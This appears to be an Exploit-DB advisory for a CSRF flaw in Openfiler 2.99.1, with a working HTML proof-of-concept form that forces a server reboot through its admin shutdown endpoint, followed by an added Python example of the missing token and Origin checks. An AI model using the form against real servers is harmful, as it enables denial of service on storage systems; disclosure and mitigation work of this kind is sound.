
Web application vulnerability: OpenFiler 2.99.1 - CSRF Vulnerability

2014-09-30 04:05
<!--
# Exploit Title: DoS via CSRF in openfiler
# Exploit author: Dolev Farhi @dolevff
# Date 07/05/2014
# Vendor homepage: http://www.openfiler.com
# Affected Software version: 2.99.1
# Alerted vendor: 7.5.14
# CVE: N/A


Software Description
=====================
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
Storage Area Networking functionality in a single cohesive framework.



Vulnerability Description
=========================
It is possible to shut down or reboot a server running Openfiler, causing a denial of service, via CSRF because session tokens are missing.


Steps to reproduce / PoC:
=========================
-->
<html>
<body>
<div align="center">
<h2><b>DoS</b></h2>
<form
action="https://ip.add.re.ss:446/admin/system_shutdown.html"
method="POST">
<input type="hidden" name="shutdowntype" value="reboot" />
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="action" value="Shutdown" />
<input type="submit" name="submit" value="Attack" />
</form>
</div>
</body>
</html>
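
The missing control named in the vulnerability description, shown as an added example (not part of the original advisory and not Openfiler code): a session-bound anti-CSRF token plus an Origin check, applied to the same form fields the PoC submits. The `csrf_token` field name, the `filer.example` origin and the session id are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed values for this example; none come from Openfiler.
SERVER_KEY = secrets.token_bytes(32)          # per-deployment secret
TRUSTED_ORIGIN = "https://filer.example:446"  # hypothetical admin UI origin
STATE_CHANGING = {"POST", "PUT", "DELETE", "PATCH"}


def issue_token(session_id: str) -> str:
    """Token embedded in every admin form; bound to the caller's session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """Compare Origin (or Referer as fallback) against the admin UI origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when neither header is present
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def check_request(method: str, headers: dict, form: dict, session_id: str):
    """Return (allowed, reason) for a request that carries a valid session cookie."""
    if method not in STATE_CHANGING:
        return True, "safe method"
    if not same_origin(headers):
        return False, "cross-origin request"
    supplied = form.get("csrf_token", "")  # hypothetical field name
    expected = issue_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed requests: the PoC's form fields as a cross-site post, then from the real UI.
SESSION = "constructed-session-id"
POC_FORM = {"shutdowntype": "reboot", "delay": "0", "action": "Shutdown"}
forged = check_request("POST", {"Origin": "https://other.example"}, POC_FORM, SESSION)
no_token = check_request("POST", {"Origin": TRUSTED_ORIGIN}, POC_FORM, SESSION)
genuine = check_request("POST", {"Origin": TRUSTED_ORIGIN},
                        {**POC_FORM, "csrf_token": issue_token(SESSION)}, SESSION)

if __name__ == "__main__":
    for name, result in [("forged", forged), ("no token", no_token), ("genuine", genuine)]:
        print(f"{name}: {result}")
```

The session cookie alone is never sufficient here: the browser attaches it to cross-site posts automatically, which is why the token has to travel in the form body and be checked server-side.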

Source: www.exploit-db.com/exploits/34818